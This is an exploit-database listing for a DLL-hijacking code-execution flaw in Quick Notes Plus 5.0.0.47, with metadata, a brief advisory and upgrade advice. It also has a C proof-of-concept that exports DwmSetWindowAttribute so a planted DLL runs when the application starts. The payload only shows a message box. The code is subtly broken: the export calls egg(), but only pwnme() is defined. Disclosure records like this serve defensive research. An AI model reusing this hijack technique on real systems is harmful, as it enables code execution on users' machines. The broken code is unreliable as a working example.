header-logo
Suggest Exploit
vendor:
Quick Notes Plus
by:
SecurityFocus
9.3
CVSS
HIGH
Arbitrary Code Execution
94
CWE
Product Name: Quick Notes Plus
Affected Version From: 5.0.0.47
Affected Version To: 5.0.0.47
Patch Exists: Yes
Related CWE: N/A
CPE: a:quick_notes_plus:quick_notes_plus
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Quick Notes Plus Arbitrary Code Execution Vulnerability

Quick Notes Plus is prone to an arbitrary-code-execution vulnerability. Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application. An example exploit code is provided which shows a MessageBox with the text 'dll hijacked !!' when the vulnerable application is run.

Mitigation:

Upgrade to the latest version of Quick Notes Plus to mitigate this vulnerability.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/45689/info

Quick Notes Plus is prone to an arbitrary-code-execution vulnerability.

Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application.

Quick Notes Plus 5.0.0.47 is vulnerable; other versions may also be affected. 

#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }

int pwnme()
{
  MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
  exit(0);
  return 0;
}